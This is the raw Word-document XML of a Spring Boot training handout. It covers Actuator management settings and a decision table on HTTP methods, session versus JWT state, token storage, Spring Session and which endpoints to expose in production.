─────────────────────────────────────</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management.server.port=8081</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management.endpoints.web.exposure.include=health,info,metrics,prometheus,loggers</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management.endpoint.health.show-details=when-authorized</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management.endpoint.health.probes.enabled=true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management.endpoint.shutdown.enabled=false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management.info.env.enabled=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9000"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1E293B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7DD3FC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">management.info.git.mode=full</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A2B4A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Decision Flowchart for Key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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6560"/>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Answer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Should I use GET or POST?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If reading data only → GET. If changing state, submitting data, or sending sensitive info → POST. When in doubt, POST.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Should I use Stateful or Stateless?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Traditional MVC web app → Stateful (sessions). REST API / microservices / mobile → Stateless (JWT). Banking/healthcare needing instant revocation → Stateful.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Should I use Local Storage for JWT?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NEVER for authentication tokens. Use HttpOnly cookies. Local Storage is for UI preferences and non-sensitive data only.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Do I need Spring Session?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If deploying to more than one server instance → YES, always. Spring Session with Redis is non-negotiable in production multi-instance deployments.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Which Actuator endpoints to expose?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Production minimum: health, info, metrics, prometheus. Never expose * in production. Always on a separate management port.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b/>
                <w:bCs/>
                <w:color w:val="1A2B4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Server-side or client-side redirect?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40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">After form POST (MVC) → Server-side PRG. After AJAX call (SPA) → Client-side. SEO URL change → Server-side 301.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thick" w:color="166534" w:sz="16"/>
              <w:bottom w:val="single" w:color="166534" w:sz="6"/>
              <w:right w:val="single" w:color="166534" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="DCFCE7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="166534"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🎓  Congratulations — Training Complete!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="334155"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Congratulations on completing this training! The concepts covered here — HTTP fundamentals, stateful vs stateless architecture, Spring Session, Local Storage security, redirect patterns, and Spring Boot Actuator — form the backbone of professional backend development. Every major enterprise Java application uses these concepts daily.
Recommended next steps: Implement a small banking demo application that incorporates all of these concepts. Then explore Spring Security (deep dive), JWT refresh token patterns, Prometheus + Grafana local setup, and Docker/Kubernetes deployment with health probe configuration.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120" w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Senior Java Backend Architect  |  30+ Years Experience</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w: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before="0" w:after="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Spring Boot Actuator &amp; Session Handling</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="94A3B8"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Professional Training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B4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2B4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2026-03-05T03:27:03.458Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T03:27:03.459Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>